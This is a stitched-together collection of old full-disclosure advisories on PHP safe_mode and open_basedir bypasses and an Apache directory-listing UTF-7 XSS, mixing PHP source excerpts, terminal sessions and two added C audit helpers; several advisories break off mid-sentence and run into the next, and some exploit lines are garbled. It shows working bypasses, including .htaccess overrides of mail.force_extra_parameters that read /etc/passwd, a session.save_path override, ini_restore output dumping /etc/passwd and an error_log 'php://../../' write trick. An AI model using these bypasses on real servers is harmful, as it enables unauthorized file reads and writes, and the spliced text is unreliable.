        if (tmp_url->query || tmp_url->fragment || php_check_open_basedir(tmp_url->path TSRMLS_CC) || \
            (PG(safe_mode) && !php_checkuid(tmp_url->path, "rb+", CHECKUID_CHECK_MODE_PARAM)) \
        ) { \
            php_url_free(tmp_url); \
            php_curl_ret(__ret); \
        }
[Full-disclosure] PHP 5.2.4 mail.force_extra_parameters unsecure
[PHP 5.2.4 mail.force_extra_parameters unsecure]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 06.09.2007
- Public: 0x.0x.2007

SecurityReason Research
SecurityAlert Id: 47
CVE: CVE-2007-3378
SecurityRisk: Medium
Affected Software: PHP <= 5.2.4
Advisory URL: http://securityreason.com/achievement_securityalert/47
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so.

php_value name value
Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead.

php_flag name on|off
Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode.

http://pl.php.net/manual/en/configuration.changes.php

--- 1. htaccess safemode and open_basedir Bypass Vulnerability per mail.force_extra_parameters ---

We have received a lot of questions about the news item http://securityreason.com/news/0/0x1f, and we will show how to exploit this issue.

When using PHP as an Apache module, you can also change the configuration settings using directives in a .htaccess file.
But it is possible to bypass safe_mode or open_basedir via mail.force_extra_parameters. On a lot of servers it is sendmail; it can also be exim etc. But we show how to exploit this for the famous mail server (SENDMAIL).

For example you can set mail.force_extra_parameters via .htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes
Content-Length: 44
Content-Type: text/html

Apache 2.2.4 and PHP 5.2.4. Let's see the folder "/narkotyk" in localhost:82.

cxib# ls -la
total 10
drwxrwxrwx  2 www  www    512 Sep  7 00:26 .
drwxr-xr-x  4 www  wheel  512 Sep  7 00:22 ..
-rw-r--r--  1 www  www    106 Sep  7 00:25 .htaccess
-rw-r--r--  1 www  www     29 Sep  7 00:25 file1.php
-rw-r--r--  1 www  www     56 Sep  7 00:26 file2.php
cxib# cat file1.php
<?php include("/etc/passwd"); ?>
cxib# curl http://localhost:82/narkotyk/file1.php

Warning: include() [function.include]: SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/passwd owned by uid 0 in /usr/local/www/apache22/data/narkotyk/file1.php on line 1

Warning: include(/etc/passwd) [function.include]: failed to open stream: Invalid argument in /usr/local/www/apache22/data/narkotyk/file1.php on line 1

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/local/www/apache22/data/narkotyk/file1.php on line 1

so safe_mode is on. Let's see the files .htaccess and file2.php:

cxib# cat file2.php
cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /etc/passwd -X /usr/local/www/apache22/data/narkotyk/result.txt'

and let's send a request to file2.php:

cxib# curl http://localhost:82/narkotyk/file2.php
bool(false)

False!?
No.

cxib# ls -la /usr/local/www/apache22/data/narkotyk/result.txt
-rw-r--r--  1 www  www  7130 Sep  7 00:31 /usr/local/www/apache22/data/narkotyk/result.txt
cxib#

result.txt has been created.

cxib# cat /usr/local/www/apache22/data/narkotyk/result.txt
69647 >>> /etc/passwd: line 3: unknown configuration line "root:*:0:0:Charlie &:/root:/bin/csh"
69647 >>> /etc/passwd: line 4: unknown configuration line "toor:*:0:0:Bourne-again Superuser:/root:"
etc.

We can read the file, and safe_mode and open_basedir are bypassed.

It is possible to create a file with PHP code. But we need a sendmail.cf to send email. Example:

cxib# cat .htaccess
php_value mail.force_extra_parameters '-C /usr/local/www/apache22/data/narkotyk/sendmail.cf -X /usr/local/www/apache22/data/narkotyk/phpcode.php'
cxib# cat file3.php
allo", "root")); ?>

We need to create /usr/local/www/apache22/data/narkotyk/sendmail.cf and configure this file. Then

cxib# curl http://localhost:8
[Full-disclosure] Apache2 Undefined Charset UTF-7 XSS Vulnerability
[Apache2 Undefined Charset UTF-7 XSS Vulnerability]

Author: SecurityReason
Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 08.08.2007
- Public: 11.09.2007

SecurityReason Research
SecurityAlert Id: 46
CVE: CVE-2007-4465
SecurityRisk: Low
Affected Software: Apache 2.x (mod_autoindex)
Advisory URL: http://securityreason.com/achievement_securityalert/46
Vendor: http://httpd.apache.org

--- 0. Description ---

The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

Apache has been the most popular web server on the Internet since April 1996. The November 2005 Netcraft Web Server Survey found that more than 70% of the web sites on the Internet are using Apache, thus making it more widely used than all other web servers combined.

--- 1. Apache2 XSS Undefined Charset UTF-7 XSS Vulnerability ---

The XSS (UTF-7) exists in mod_autoindex.c. The charset is not defined, and an XSS attack can be carried out using the "P" option available in Apache 2.2.4, by setting the charset to UTF-7.

"P=pattern lists only files matching the given pattern"

More: http://httpd.apache.org/docs/2.0/mod/mod_autoindex.html

--Source code from mod_autoindex.c--
#if APR_HAS_UNICODE_FS
    ap_set_content_type(r, "text/html;charset=utf-8");
#else
    ap_set_content_type(r, "text/html");
#endif
--Source code from mod_autoindex.c--

If APR_HAS_UNICODE_FS is set to 1 then we have a defined charset, and this is the case on Windows systems. But on Unix and Linux systems the charset is not defined.

--- EXAMPLE 1 ---
# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /icons/ http/1.1
Host: localhost
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive

HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

Index of /icons
Index of /icons
..
--- EXAMPLE 1 ---

--- EXAMPLE 2 ---
# telnet httpd.apache.org 80
Trying 140.211.11.130...
Connected to httpd.apache.org.
Escape character is '^]'.
GET /icons/ http/1.1
Host: httpd.apache.org
Content-type: text/html
Keep-Alive: 300
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2007 23:06:26 GMT
Server: Apache/2.3.0-dev (Unix)
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

Index of /icons
Index of /icons
..
--- EXAMPLE 2 ---

Any request to the /icons folder gives no charset, neither in the main header nor in the section. In requests like 400, 404 etc. the charset is defined (standard UTF8). For example:

--- EXAMPLE 3 (400) ---
# telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /%0 HTTP/1.1
Host: localhost

HTTP/1.1 400 Bad Request
Date: Thu, 09 Aug 2007 13:13:32 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
..
--- EXAMPLE 3 ---

--- EXAMPLE 4 (404) ---
# telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /noex HTTP/1.1
Host: localhost

HTTP/1.1 404 Not Found
Date: Thu, 09 Aug 2007 13:14:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
..
--- EXAMPLE 4 ---

Any request from the 4xx family is defined with a charset.
Because it is possible to put text into the page (like a wrong path) in a 404. The main idea was that nobody can put any text into this page with a folder listing. And it was a good idea, but in Apache 2.x the "P" option exists. Like:

http://localhost/icons/?P=[Filter]

Any value given to this variable is displayed in the HTML text. For example:

http://localhost/icons/?P=Hallo

--- HTML ---
Name
---

--- 2. Exploit ---

SecurityReason is not going to release an exploit to the general public. The exploit was provided to and tested by the Apache Team.

--- 3. How to fix ---

Update to Apache 2.2.6
http://www.apache.org/dist/httpd/CHANGES_2.2.6

---
mod_autoindex: Add in Type and Charset options to IndexOptions directive. This allows the admin to explicitly set the content-type and charset of the generated page and is therefore a viable workaround for buggy browsers affected by CVE-2007-4465 (cve.mitre.org). [Jim Jagielski]
---

--- 4. Greets ---

For: sp3x, Infospec, p_e_a

--- 5. Contact ---

Author: Securi
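The four sessions above make the problem visible in one header: the listing is served as "Content-Type: text/html" with nothing else, which leaves the browser free to guess the encoding, while the 4xx pages carry charset=iso-8859-1. The added example below (our code, not Apache's; content_type_has_charset and html_missing_charset are hypothetical names) is the check an administrator can run over captured responses to find pages that still omit the charset; the two samples are constructed from the headers shown in the advisory.

```c
#include <ctype.h>
#include <string.h>

/* Case-insensitive "does s start with prefix". */
static int starts_with_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Does a Content-Type header value carry a non-empty charset parameter? */
int content_type_has_charset(const char *value)
{
    const char *p = strchr(value, ';');
    while (p) {
        p++;
        while (*p == ' ' || *p == '\t')
            p++;
        if (starts_with_ci(p, "charset=")) {
            p += 8;
            return *p != '\0' && *p != ';';
        }
        p = strchr(p, ';');
    }
    return 0;
}

/* Scan the header block of a raw HTTP response (lines ending in CRLF or LF,
 * headers terminated by an empty line). Returns 1 for a text/html response
 * without a charset, 0 for any other response, -1 if no Content-Type at all. */
int html_missing_charset(const char *response)
{
    const char *line = response;
    while (*line != '\0' && *line != '\r' && *line != '\n') {
        const char *end = line + strcspn(line, "\r\n");
        if (starts_with_ci(line, "content-type:")) {
            char value[256];
            const char *v = line + strlen("content-type:");
            size_t n;
            while (*v == ' ' || *v == '\t')
                v++;
            n = (size_t)(end - v);
            if (n >= sizeof value)
                n = sizeof value - 1;
            memcpy(value, v, n);
            value[n] = '\0';
            if (!starts_with_ci(value, "text/html"))
                return 0;
            return content_type_has_charset(value) ? 0 : 1;
        }
        if (*end == '\r')
            end++;
        if (*end == '\n')
            end++;
        line = end;
    }
    return -1;
}

/* Constructed samples modelled on the advisory's sessions: a directory
 * listing without charset (EXAMPLE 2) and a 404 with one (EXAMPLE 4). */
const char *const SAMPLE_LISTING =
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.3.0-dev (Unix)\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><head><title>Index of /icons</title></head></html>";

const char *const SAMPLE_404 =
    "HTTP/1.1 404 Not Found\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Content-Type: text/html; charset=iso-8859-1\r\n"
    "\r\n";
```

On Apache 2.2.6 and later the fix named above is applied with IndexOptions Charset=UTF-8 (and Type=text/html), which makes the listing's header look like the 404's.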
[Full-disclosure] PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability
Source: http://securityreason.com/achievement_securityalert/45

[PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass Vulnerability]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- Written: 10.02.2007
- Public: 27.06.2007

SecurityReason Research
SecurityAlert Id: 45
CVE: CVE-2007-3378
SecurityRisk: High
Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7
Advisory URL: http://securityreason.com/achievement_securityalert/45
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf) and .htaccess files. You will need "AllowOverride Options" or "AllowOverride All" privileges to do so.

php_value name value
Sets the value of the specified directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a previously set value use none as the value.
Note: Don't use php_value to set boolean values. php_flag (see below) should be used instead.

php_flag name on|off
Used to set a boolean configuration directive. Can be used only with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the specified parameters to be passed as extra parameters to the sendmail binary. These parameters will always replace the value of the 5th parameter to mail(), even in safe mode.

http://pl.php.net/manual/en/configuration.changes.php

--- 1. htaccess safemode and open_basedir Bypass Vulnerability ---

When using PHP as an Apache module, you can also change the configuration settings using directives in a .htaccess file.
These options are used by a lot of users to change permission options like display_errors etc. But it is possible to bypass safe_mode or open_basedir in different functions. For example you can set session.save_path via .htaccess. In the functions session_save_path() and ini_set(), save_path is checked against safe_mode and open_basedir. In .htaccess it is bypassed: values from .htaccess are not checked.

For example:

cxib# ls -la /www/cxib/
total 14
drwxr-xr-x   3 cxib  www   512 Feb 16 20:20 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:07 ..
-rw-r--r--   1 cxib  www    53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html

Warning: session_save_path() [function.session-save-path]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 2

Warning: session_start() [function.session-start]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in /www/cxib/stars.php on line 3

Fatal error: session_start() [function.session-start]: Failed to initialize storage module: files (path: ) in /www/cxib/stars.php on line 3
Connection closed by foreign host.
cxib#

So we can't create a session in that directory. But when we create a .htaccess file, we can write there:

---
php_value session.save_path /inne
---

cxib# ls -la /www/cxib/
total 16
drwxr-xr-x   3 cxib  www   512 Feb 16 20:26 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:26 ..
-rw-r--r--   1 cxib  www    34 Feb 16 20:26 .htaccess
-rw-r--r--   1 cxib  www    53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php

We can't set session.save_path via ini_set() or session_save_path(). Let's try sending a request.

cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html

Connection closed by foreign host.
cxib#
cxib# ls -la /inne
total 3
drwxrwxrwx  2 root  wheel  512 Feb 16 20:30 .
drwxr-xr
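Both .htaccess advisories on this page (mail.force_extra_parameters above, and session.save_path here) rest on the same gap: php_value and php_flag set INI directives without the safe_mode and open_basedir checks that ini_set() and session_save_path() apply. The structural fix is AllowOverride None (or at least not Options/All) for directories users can write to; where overrides must stay enabled, the added example below (our code, not PHP's or Apache's; htaccess_risky_directive and htaccess_count_risky are hypothetical names, and the directive list beyond the page's two entries is our addition) audits .htaccess files for overrides that change where PHP reads, writes or executes.

```c
#include <ctype.h>
#include <string.h>

/* INI directives whose .htaccess override changes where PHP reads, writes or
 * executes. The first two come from the advisories on this page; the rest are
 * our additions of the same kind. */
static const char *const RISKY_DIRECTIVES[] = {
    "session.save_path",
    "mail.force_extra_parameters",
    "include_path",
    "auto_prepend_file",
    "auto_append_file",
    NULL
};

/* Case-insensitive comparison of the n-byte word at s with kw. */
static int word_eq_ci(const char *s, size_t n, const char *kw)
{
    if (strlen(kw) != n)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)s[i]) != tolower((unsigned char)kw[i]))
            return 0;
    return 1;
}

/* If `line` is a php_value / php_flag directive naming one of the risky
 * settings, return that setting's name, else NULL. Comments and leading
 * whitespace are tolerated; the Apache keyword is matched case-insensitively,
 * the INI name exactly (PHP INI names are case-sensitive). */
const char *htaccess_risky_directive(const char *line)
{
    while (isspace((unsigned char)*line))
        line++;
    if (*line == '#' || *line == '\0')
        return NULL;
    size_t kwlen = strcspn(line, " \t");
    if (!word_eq_ci(line, kwlen, "php_value") && !word_eq_ci(line, kwlen, "php_flag"))
        return NULL;
    const char *name = line + kwlen;
    while (*name == ' ' || *name == '\t')
        name++;
    size_t namelen = strcspn(name, " \t\r\n");
    for (size_t i = 0; RISKY_DIRECTIVES[i]; i++)
        if (strlen(RISKY_DIRECTIVES[i]) == namelen &&
            strncmp(name, RISKY_DIRECTIVES[i], namelen) == 0)
            return RISKY_DIRECTIVES[i];
    return NULL;
}

/* Count risky directives in the full text of one .htaccess file. Lines longer
 * than the scratch buffer are judged on their first 511 bytes. */
int htaccess_count_risky(const char *text)
{
    int count = 0;
    const char *line = text;
    while (*line) {
        size_t len = strcspn(line, "\n");
        char buf[512];
        size_t copy = len < sizeof buf ? len : sizeof buf - 1;
        memcpy(buf, line, copy);
        buf[copy] = '\0';
        if (htaccess_risky_directive(buf))
            count++;
        line += len;
        if (*line == '\n')
            line++;
    }
    return count;
}

/* Constructed sample: the two overrides from the advisories plus a harmless one. */
const char *const SAMPLE_HTACCESS =
    "# session handling\n"
    "php_flag display_errors on\n"
    "php_value session.save_path /inne\n"
    "PHP_VALUE mail.force_extra_parameters '-X /tmp/trace.txt'\n";
```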
[Full-disclosure] PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
[PHP 5.2.0 session.save_path safe_mode and open_basedir bypass]

Author: Maksymilian Arciemowicz (SecurityReason)
Date:
- Written: 02.10.2006
- Public: 08.12.2006
SecurityAlert Id: 43
CVE: CVE-2006-6383
SecurityRisk: High
Affected Software: PHP 5.2.0
Advisory URL: http://securityreason.com/achievement_securityalert/43
Vendor: http://www.php.net

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

Session support in PHP consists of a way to preserve certain data across subsequent accesses. This enables you to build more customized applications and increase the appeal of your web site. A visitor accessing your web site is assigned a unique id, the so-called session id. This is either stored in a cookie on the user side or is propagated in the URL.

session.save_path defines the argument which is passed to the save handler. If you choose the default files handler, this is the path where the files are created. Defaults to /tmp. See also session_save_path(). There is an optional N argument to this directive that determines the number of directory levels your session files will be spread around in. For example, setting to '5;/tmp' may end up creating a session file and location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If. In order to use N you must create all of these directories before use. A small shell script exists in ext/session to do this, it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic garbage collection will not be performed, see a copy of php.ini for further information. Also, if you use N, be sure to surround session.save_path in "quotes" because the separator (;) is also used for comments in php.ini.

--- 1. session.save_path safe mode and open basedir bypass ---

session.save_path can be set in the ini_set() and session_save_path() functions. In session.save_path there must be the path where you will save your tmp files. But the syntax for session.save_path can be:

[/PATH]
OR
[N;/PATH]

N - can be a string.

EXAMPLES:
1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
and
3. session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")

-1477-1493--- Code from PHP520 ext/session/session.c [START]
PHP_FUNCTION(session_save_path)
{
    zval **p_name;
    int ac = ZEND_NUM_ARGS();
    char *old;

    if (ac < 0 || ac > 1 || zend_get_parameters_ex(ac, &p_name) == FAILURE)
        WRONG_PARAM_COUNT;

    old = estrdup(PS(save_path));

    if (ac == 1) {
        convert_to_string_ex(p_name);
        zend_alter_ini_entry("session.save_path", sizeof("session.save_path"), Z_STRVAL_PP(p_name), Z_STRLEN_PP(p_name), PHP_INI_USER, PHP_INI_STAGE_RUNTIME);
    }
    RETVAL_STRING(old, 0);
}
-1477-1493--- Code from PHP520 ext/session/session.c [END]

Values are set to hash_memory (but before that, safe_mode and open_basedir check this value). And if you are starting a session (for example session_start()), the value from session.save_path is checked by the function PS_OPEN_FUNC(files).

-242-300--- Code from PHP520 ext/session/mod_files.c [START]
PS_OPEN_FUNC(files)
{
    ps_files *data;
    const char *p, *last;
    const char *argv[3];
    int argc = 0;
    size_t dirdepth = 0;
    int filemode = 0600;

    if (*save_path == '\0') {
        /* if save path is an empty string, determine the temporary dir */
        save_path = php_get_temporary_directory();
    }

    /* split up input parameter */
    last = save_path;
    p = strchr(save_path, ';');
    while (p) {
        argv[argc++] = last;
        last = ++p;
        p = strchr(p, ';');
        if (argc > 1) break;
    }
    argv[argc++] = last;

    if (argc > 1) {
        errno = 0;
        dirdepth = (size_t) strtol(argv[0], NULL, 10);
        if (errno == ERANGE) {
            php_error(E_WARNING, "The first parameter in session.save_path is invalid");
            return FAILURE;
        }
    }

    if (argc > 2) {
        errno = 0;
        filemode = strtol(arg
[Full-disclosure] PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()
Source: http://securityreason.com/achievement_securityalert/42

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 05.09.2006
- Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 <= x
Advisory URL: http://securityreason.com/achievement_securityalert/42
Vendor: http://www.php.net

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

php_admin_value name value
    Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.

php_admin_flag name on|off
    Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

--- 1. php_admin_value and php_admin_flag Bypass ---

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf). These options are used by a lot of ISPs to set open_basedir, safe_mode and more options. For example: open_basedir in httpd.conf

---
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
---

In PHP there are two config options: Local Value and Master Value. More in phpinfo() or ini_get().

Example: If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is the default value, you can restore Master Value to Local Value with the ini_restore() function!

---
ini_restore
(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
---

Restores the value from the php.ini file. Then your PHP options from httpd.conf are bypassed.

EXPLOIT:
---
---

RESULT OF EXPLOIT:
---
1
/usr/home/frajer/public_html/

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/home/frajer/public_html/ini_restore.php on line 4

# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-ag.
---

This issue is very dangerous, because Admin can't correctly set open_basedir or safe_mode for all users.

--- 2. How to fix ---

Fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

--- 3. Greets ---

For: sp3x and p_e_a, l5x

--- 4. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards
SecurityReason
[Full-disclosure] error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2
Source: http://securityreason.com/achievement_securityalert/41

[error_log() Safe Mode Bypass PHP 5.1.4 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 10.6.2006
- Public: 26.06.2006
from SECURITYREASON.COM
CVE-2006-3011

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

error_log -- Send an error message somewhere.

--- 1. error_log() Safe Mode Bypass ---

The error_log() function sends your error message to email, a file or the display. You can send error messages per mail or write them into files. The issue is very simple. error_log() checks safe_mode and open_basedir in the stream function. But using a URL isn't allowed. And the problem exists in an incorrect filename.

PHP5:
-2013-2050---
PHPAPI int _php_error_log(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {
        case 1: /*send an email */
        {
#if HAVE_SENDMAIL
            if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                return FAILURE;
            }
#else
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
            return FAILURE;
#endif
        }
        break;

        case 2: /*send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3: /*save to a file */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
-2013-2050---

Let's look at option 3.

-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---

Option "a": write the error to the file or, if the file doesn't exist, create a new file. The problem is that in php_stream_open_wrapper() "IGNORE_URL" is defined. IGNORE_URL turns off safe_mode if you use "prefix://../../".

-Example---
cxib# php -r 'error_log("", 3, "/www/temp/sr.php");'

Warning: error_log(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: error_log(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'error_log("", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r--  1 cxib  www  16 Jun 11 17:47 /www/temp/sr.php
cxib#
-Example---

--- 2. Exploit ---

", 3, "php://../../".$file); ?>

--- 3. How to fix ---

No response from PHP Team. We have reported this bug on 11.06.2006

--- 4. Greets ---

For: sp3x and p_e_a, l3x, pi3, eax, Infospec, gKPc8O3

--- 5. Contact ---

Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

SecurityReason.Com
[Full-disclosure] tempnam() Bypass unique file name PHP 5.1.4
Source: http://securityreason.com/achievement_securityalert/40

[tempnam() Bypass unique file name PHP 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 22.5.2006
- Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660

--- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

tempnam -- Create file with unique file name.

--- 1. tempnam() Bypass unique file name ---

In the latest adv I have published an issue "Open Basedir Bypass". In function tempnam() 2 args are required.

http://pl.php.net/manual/en/function.tempnam.php
string tempnam ( string dir, string prefix )

